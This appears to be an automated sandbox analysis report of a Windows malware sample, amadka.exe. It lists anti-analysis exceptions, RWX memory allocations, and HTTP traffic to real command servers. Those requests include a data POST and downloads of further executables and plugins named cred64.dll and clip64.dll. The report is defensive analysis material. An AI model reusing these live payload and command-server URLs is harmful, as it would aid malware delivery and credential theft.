__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb e9 00 00 00 00 50 b8 19 ee cd 6f b9 81 ba 17 exception.symbol: amadka+0x1fa418 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2073624 exception.address: 0x12aa418 registers.esp: 4062548 registers.edi: 1114345 registers.eax: 29174 registers.ebp: 4007964692 registers.edx: 2130566132 registers.ebx: 0 registers.esi: 19573712 registers.ecx: 1375758944	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: cd 01 eb 00 e9 10 00 00 00 3e 14 53 97 3b 9d 40 exception.symbol: amadka+0x1fae44 exception.instruction: int 1 exception.module: amadka.exe exception.exception_code: 0xc0000005 exception.offset: 2076228 exception.address: 0x12aae44 registers.esp: 4062508 registers.edi: 0 registers.eax: 4062508 registers.ebp: 4007964692 registers.edx: 1493520331 registers.ebx: 19574540 registers.esi: 19555018 registers.ecx: 0	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 51 52 ba 0c 98 77 7f f7 d2 e9 17 00 00 00 29 exception.symbol: amadka+0x2092a3 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2134691 exception.address: 0x12b92a3 registers.esp: 4062544 registers.edi: 19631564 registers.eax: 27896 registers.ebp: 4007964692 registers.edx: 6 registers.ebx: 69714768 registers.esi: 1971262480 registers.ecx: 0	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 3c 24 e9 68 01 00 00 8f 07 81 ec exception.symbol: amadka+0x209053 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2134099 exception.address: 0x12b9053 registers.esp: 4062548 registers.edi: 19634244 registers.eax: 27896 registers.ebp: 4007964692 registers.edx: 6 registers.ebx: 0 registers.esi: 1971262480 registers.ecx: 2170115153	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 81 c1 00 71 fb 7a 81 c1 04 5b fd 7f 03 0c 24 exception.symbol: amadka+0x209e0c exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2137612 exception.address: 0x12b9e0c registers.esp: 4062544 registers.edi: 19634244 registers.eax: 28730 registers.ebp: 4007964692 registers.edx: 1168914931 registers.ebx: 0 registers.esi: 1971262480 registers.ecx: 19634672	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 68 58 19 00 00 e9 85 00 00 00 53 e9 00 00 00 exception.symbol: amadka+0x209af0 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2136816 exception.address: 0x12b9af0 registers.esp: 4062548 registers.edi: 19634244 registers.eax: 28730 registers.ebp: 4007964692 registers.edx: 1168914931 registers.ebx: 0 registers.esi: 1971262480 registers.ecx: 19663402	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 56 55 68 4b 84 f4 5d e9 d5 fc ff ff e9 01 04 exception.symbol: amadka+0x20a4c1 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2139329 exception.address: 0x12ba4c1 registers.esp: 4062548 registers.edi: 19634244 registers.eax: 28730 registers.ebp: 4007964692 registers.edx: 262633 registers.ebx: 0 registers.esi: 1971262480 registers.ecx: 19637450	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 04 24 68 fd 1b 0e 40 e9 exception.symbol: amadka+0x20dabf exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2153151 exception.address: 0x12bdabf registers.esp: 4062540 registers.edi: 19634244 registers.eax: 19675303 registers.ebp: 4007964692 registers.edx: 1498545945 registers.ebx: 1825736014 registers.esi: 1971262480 registers.ecx: 19637450	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb e9 10 00 00 00 5d e9 7a 04 00 00 31 c7 58 29 exception.symbol: amadka+0x20d70d exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2152205 exception.address: 0x12bd70d registers.esp: 4062540 registers.edi: 19634244 registers.eax: 19652279 registers.ebp: 4007964692 registers.edx: 2089298280 registers.ebx: 1825736014 registers.esi: 0 registers.ecx: 19637450	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 55 e9 10 03 00 00 b8 3c 19 ca 57 21 c2 8b 04 exception.symbol: amadka+0x214c9b exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2182299 exception.address: 0x12c4c9b registers.esp: 4062540 registers.edi: 19708520 registers.eax: 30120 registers.ebp: 4007964692 registers.edx: 2130566132 registers.ebx: 247636390 registers.esi: 0 registers.ecx: 792330240	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 50 55 bd 58 79 e5 6f 68 2a 29 79 11 89 1c 24 exception.symbol: amadka+0x2145e2 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2180578 exception.address: 0x12c45e2 registers.esp: 4062540 registers.edi: 19681264 registers.eax: 30120 registers.ebp: 4007964692 registers.edx: 1783979243 registers.ebx: 247636390 registers.esi: 0 registers.ecx: 792330240	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 51 68 dd 1b 5f 5f 59 81 c3 c2 23 df 2f 01 cb exception.symbol: amadka+0x231e16 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2301462 exception.address: 0x12e1e16 registers.esp: 4062504 registers.edi: 1996483482 registers.eax: 31276 registers.ebp: 4007964692 registers.edx: 2130566132 registers.ebx: 19798224 registers.esi: 19794228 registers.ecx: 792330240	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb e9 91 00 00 00 5a 81 e9 fb ff ff df 89 ca 59 exception.symbol: amadka+0x231ed4 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2301652 exception.address: 0x12e1ed4 registers.esp: 4062508 registers.edi: 1996483482 registers.eax: 31276 registers.ebp: 4007964692 registers.edx: 4078550614 registers.ebx: 19801408 registers.esi: 19794228 registers.ecx: 0	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 68 89 68 05 61 89 3c 24 68 5d 74 64 67 ff 34 exception.symbol: amadka+0x232a83 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2304643 exception.address: 0x12e2a83 registers.esp: 4062508 registers.edi: 1996483482 registers.eax: 19830239 registers.ebp: 4007964692 registers.edx: 4078550614 registers.ebx: 19801408 registers.esi: 19794228 registers.ecx: 772479281	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb e9 0c ff ff ff 81 ee d2 63 38 7e 51 b9 46 2c exception.symbol: amadka+0x232849 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2304073 exception.address: 0x12e2849 registers.esp: 4062508 registers.edi: 1996483482 registers.eax: 19830239 registers.ebp: 4007964692 registers.edx: 4078550614 registers.ebx: 4294941360 registers.esi: 2345765728 registers.ecx: 772479281	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 52 e9 00 00 00 00 89 2c 24 bd 16 6d d7 6f f7 exception.symbol: amadka+0x234262 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2310754 exception.address: 0x12e4262 registers.esp: 4062504 registers.edi: 1996483482 registers.eax: 31899 registers.ebp: 4007964692 registers.edx: 1899460096 registers.ebx: 19806429 registers.esi: 2345765728 registers.ecx: 1908314276	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 57 83 ec 04 54 8f 04 24 81 04 24 04 00 00 00 exception.symbol: amadka+0x233cba exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2309306 exception.address: 0x12e3cba registers.esp: 4062508 registers.edi: 4294937880 registers.eax: 31899 registers.ebp: 4007964692 registers.edx: 1459645024 registers.ebx: 19838328 registers.esi: 2345765728 registers.ecx: 1908314276	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 81 ea 91 ea 6b 1a 81 c2 da 10 8a 6f 03 14 24 exception.symbol: amadka+0x234d7a exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2313594 exception.address: 0x12e4d7a registers.esp: 4062504 registers.edi: 19809680 registers.eax: 26796 registers.ebp: 4007964692 registers.edx: 19810178 registers.ebx: 802456232 registers.esi: 4092523885 registers.ecx: 0	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 52 89 34 24 c7 04 24 a5 bd bf 6f f7 1c 24 52 exception.symbol: amadka+0x234b93 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2313107 exception.address: 0x12e4b93 registers.esp: 4062508 registers.edi: 19809680 registers.eax: 26796 registers.ebp: 4007964692 registers.edx: 19836974 registers.ebx: 802456232 registers.esi: 4092523885 registers.ecx: 0	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 3c 24 e9 15 00 00 00 68 97 3d f8 exception.symbol: amadka+0x2350eb exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2314475 exception.address: 0x12e50eb registers.esp: 4062508 registers.edi: 0 registers.eax: 44777 registers.ebp: 4007964692 registers.edx: 19813198 registers.ebx: 802456232 registers.esi: 4092523885 registers.ecx: 0	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 68 88 94 db 6f 89 0c 24 55 c7 04 24 76 46 fb exception.symbol: amadka+0x2396be exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2332350 exception.address: 0x12e96be registers.esp: 4062508 registers.edi: 98025 registers.eax: 30911 registers.ebp: 4007964692 registers.edx: 19831539 registers.ebx: 17951662 registers.esi: 4092523885 registers.ecx: 0	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 53 bb 57 d7 7c 56 53 e9 54 fb ff ff 89 34 24 exception.symbol: amadka+0x23a644 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2336324 exception.address: 0x12ea644 registers.esp: 4062508 registers.edi: 98025 registers.eax: 19834937 registers.ebp: 4007964692 registers.edx: 361975392 registers.ebx: 0 registers.esi: 24811 registers.ecx: 314233013	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb e9 4d 03 00 00 c1 ea 04 81 c2 3d 1e 94 55 01 exception.symbol: amadka+0x23cb5a exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2345818 exception.address: 0x12ecb5a registers.esp: 4062508 registers.edi: 98025 registers.eax: 30527 registers.ebp: 4007964692 registers.edx: 361975392 registers.ebx: 0 registers.esi: 24811 registers.ecx: 19873985	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 68 00 54 8b 25 89 3c 24 e9 43 ff ff ff 8b 1c exception.symbol: amadka+0x23ccc0 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2346176 exception.address: 0x12eccc0 registers.esp: 4062508 registers.edi: 98025 registers.eax: 0 registers.ebp: 4007964692 registers.edx: 361975392 registers.ebx: 0 registers.esi: 157417 registers.ecx: 19846641	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 57 68 bd 43 7d 23 ff 34 24 5f 81 c4 04 00 00 exception.symbol: amadka+0x23e5c9 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2352585 exception.address: 0x12ee5c9 registers.esp: 4062508 registers.edi: 19874350 registers.eax: 26608 registers.ebp: 4007964692 registers.edx: 275644801 registers.ebx: 1265560122 registers.esi: 157417 registers.ecx: 19846641	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 53 e9 69 00 00 00 58 8b 3c 24 57 83 ec 04 89 exception.symbol: amadka+0x23e07b exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2351227 exception.address: 0x12ee07b registers.esp: 4062508 registers.edi: 19874350 registers.eax: 26608 registers.ebp: 4007964692 registers.edx: 1364807761 registers.ebx: 4294943932 registers.esi: 157417 registers.ecx: 19846641	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 81 c7 00 bd bf 5f e9 57 fb ff ff 5b 5e 8b 1c exception.symbol: amadka+0x2456d8 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2381528 exception.address: 0x12f56d8 registers.esp: 4062504 registers.edi: 19877599 registers.eax: 30209 registers.ebp: 4007964692 registers.edx: 2130566132 registers.ebx: 2147483650 registers.esi: 19859437 registers.ecx: 792330240	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 68 c0 22 4a 43 89 14 24 89 0c 24 e9 27 fa ff exception.symbol: amadka+0x2456f8 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2381560 exception.address: 0x12f56f8 registers.esp: 4062508 registers.edi: 19880364 registers.eax: 30209 registers.ebp: 4007964692 registers.edx: 322689 registers.ebx: 2147483650 registers.esi: 19859437 registers.ecx: 0	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 57 89 e7 81 c7 04 00 00 00 e9 9e fa ff ff 87 exception.symbol: amadka+0x2491cd exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2396621 exception.address: 0x12f91cd registers.esp: 4062504 registers.edi: 19880364 registers.eax: 25892 registers.ebp: 4007964692 registers.edx: 19891835 registers.ebx: 2147483650 registers.esi: 19859437 registers.ecx: 1306964600	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 53 e9 4a fa ff ff 8b 3c 24 e9 00 00 00 00 57 exception.symbol: amadka+0x24927e exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2396798 exception.address: 0x12f927e registers.esp: 4062508 registers.edi: 2179303765 registers.eax: 25892 registers.ebp: 4007964692 registers.edx: 19895075 registers.ebx: 0 registers.esi: 19859437 registers.ecx: 1306964600	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 56 e9 fd fd ff ff 58 81 f6 61 9f e1 cb 56 56 exception.symbol: amadka+0x26236d exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2499437 exception.address: 0x131236d registers.esp: 4062504 registers.edi: 19996492 registers.eax: 32655 registers.ebp: 4007964692 registers.edx: 2130566132 registers.ebx: 4025809151 registers.esi: 39895248 registers.ecx: 792330240	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 31 d2 ff 34 3a 8b 04 24 e9 9b ff ff ff 59 81 exception.symbol: amadka+0x262124 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2498852 exception.address: 0x1312124 registers.esp: 4062508 registers.edi: 20029147 registers.eax: 32655 registers.ebp: 4007964692 registers.edx: 2130566132 registers.ebx: 4025809151 registers.esi: 39895248 registers.ecx: 792330240	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 56 89 0c 24 68 99 a1 6f 70 89 0c 24 c7 04 24 exception.symbol: amadka+0x2622ee exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2499310 exception.address: 0x13122ee registers.esp: 4062508 registers.edi: 20029147 registers.eax: 606898513 registers.ebp: 4007964692 registers.edx: 4294937416 registers.ebx: 4025809151 registers.esi: 39895248 registers.ecx: 792330240	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 50 b8 8b 84 f1 6f 29 c6 58 03 34 24 50 e9 75 exception.symbol: amadka+0x26c28a exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2540170 exception.address: 0x131c28a registers.esp: 4062504 registers.edi: 4208881666 registers.eax: 29568 registers.ebp: 4007964692 registers.edx: 19687102 registers.ebx: 20016096 registers.esi: 20037414 registers.ecx: 18876	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 53 89 04 24 81 ec 04 00 00 00 e9 13 09 00 00 exception.symbol: amadka+0x26c077 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2539639 exception.address: 0x131c077 registers.esp: 4062508 registers.edi: 4208881666 registers.eax: 0 registers.ebp: 4007964692 registers.edx: 19687102 registers.ebx: 20016096 registers.esi: 20040334 registers.ecx: 80171607	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb 53 bb 01 91 28 3d 01 d8 e9 00 00 00 00 5b 05 exception.symbol: amadka+0x270801 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2557953 exception.address: 0x1320801 registers.esp: 4062504 registers.edi: 4208881666 registers.eax: 20052559 registers.ebp: 4007964692 registers.edx: 2130566132 registers.ebx: 240207414 registers.esi: 20040334 registers.ecx: 792330240	1
__exception__ April 19, 2024, 1:10 p.m.	stacktrace: exception.instruction_r: fb e9 70 03 00 00 b9 90 f8 c6 22 89 c8 8b 0c 24 exception.symbol: amadka+0x2703c1 exception.instruction: sti exception.module: amadka.exe exception.exception_code: 0xc0000096 exception.offset: 2556865 exception.address: 0x13203c1 registers.esp: 4062508 registers.edi: 4208881666 registers.eax: 20079958 registers.ebp: 4007964692 registers.edx: 2130566132 registers.ebx: 98601296 registers.esi: 20040334 registers.ecx: 4294943464	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (7 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://193.233.132.56/Pneh2sXQk0/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://193.233.132.167/mine/amert.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://193.233.132.167/mine/random.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://193.233.132.167/cost/random.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://193.233.132.167/cost/sarra.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll

Performs some HTTP requests (8 events)

request	POST http://193.233.132.56/Pneh2sXQk0/index.php
request	GET http://193.233.132.167/mine/amert.exe
request	GET http://193.233.132.167/mine/random.exe
request	GET http://193.233.132.167/cost/random.exe
request	GET http://193.233.132.167/cost/sarra.exe
request	GET http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll
request	GET http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll
request	GET https://db-ip.com/demo/home.php?s=175.208.134.152

Sends data using the HTTP POST Method (1 event)

request

POST http://193.233.132.56/Pneh2sXQk0/index.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 320 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7793f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x778b0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 192512 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010b1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00940000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00990000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ca0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00df0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00e00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ed0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ee0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01070000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01080000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01090000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x010a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02810000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02820000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02830000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02840000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1680 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03000000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 19, 2024, 1:10 p.m.	process_identifier: 1236 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000047b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
